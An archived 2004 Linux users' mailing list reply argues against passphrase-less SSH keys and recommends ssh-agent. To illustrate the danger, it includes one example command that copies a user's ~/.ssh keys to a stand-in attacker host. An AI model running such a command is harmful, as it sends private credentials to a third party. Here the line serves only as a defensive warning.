Mailing List Archive
tlug.jp Mailing List tlug archive tlug Mailing List Archive
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]Re: [tlug] Problems with scp anyone knows?
- Date: Fri, 30 Jan 2004 12:53:41 +0900
- From: "Stephen J. Turnbull" <stephen@example.com>
- Subject: Re: [tlug] Problems with scp anyone knows?
- References: <opr2j94rtt0fabl5@example.com><002301c3e6d5$4561b680$3000a8c0@example.com><20040130022339.GB1419@example.com>
- Organization: The XEmacs Project
- User-agent: Gnus/5.1002 (Gnus v5.10.2) XEmacs/21.5 (celeriac, linux)
>>>>> "Scott" == Scott <scottro@example.com> writes: Scott> It'll ask for a password you hit enter to leave password Scott> blank. It'll ask for confirmation. Bad idea. This is even worse than leaving a key in a little magnetic box stuck under your car's bumper, since it's trivial to do scp ~/.ssh/* 'craven@example.com:~/stolen-keys/' and the cracker can use your id without ever leaving the comfort of home. Use a password, and then $ eval `ssh-agent` $ ssh-add Most modern distros will automatically run ssh-agent for you when you log in or start an X session. If not, just put the above in the relevant rc files. Scott> I only use this on a few boxes where I'm going back and Scott> forth on an internal network and have no idea if there are Scott> major security implications with this method. Now you know. Unless physical security is _very_ good on that box (ie, start by installing a coffee maker and a urinal, so you never have to leave it), your network security is near zero, and that's a permanent loss once it happens. Even with the ssh-agent, if you have to leave your box unattended for more than 60 seconds at a time or so, see the man page for ssh-add, specifically options -D, -x, and -t. If you use PGP/GPG as well, there's something out there called "quintuple-agent" or something like that which will manage all your private keys and knows how to deal with all the different protocols. -- Institute of Policy and Planning Sciences http://turnbull.sk.tsukuba.ac.jp University of Tsukuba Tennodai 1-1-1 Tsukuba 305-8573 JAPAN Ask not how you can "do" free software business; ask what your business can "do for" free software.
- Follow-Ups:
- Re: [tlug] Problems with scp anyone knows?
- From: Scott
- References:
- [tlug] sco code in linux leaked
- From: Shawn
- [tlug] Problems with scp anyone knows?
- From: Alessandro Mantelli
- Re: [tlug] Problems with scp anyone knows?
- From: Scott
Home | Main Index | Thread Index
- Prev by Date: [tlug] RedHat 7.2 -> 9 Upgrade... stuff broke
- Next by Date: Re: [tlug] Problems with scp anyone knows?
- Previous by thread: Re: [tlug] Problems with scp anyone knows?
- Next by thread: Re: [tlug] Problems with scp anyone knows?
- Index(es):
Home Page Mailing List Linux and Japan TLUG Members Links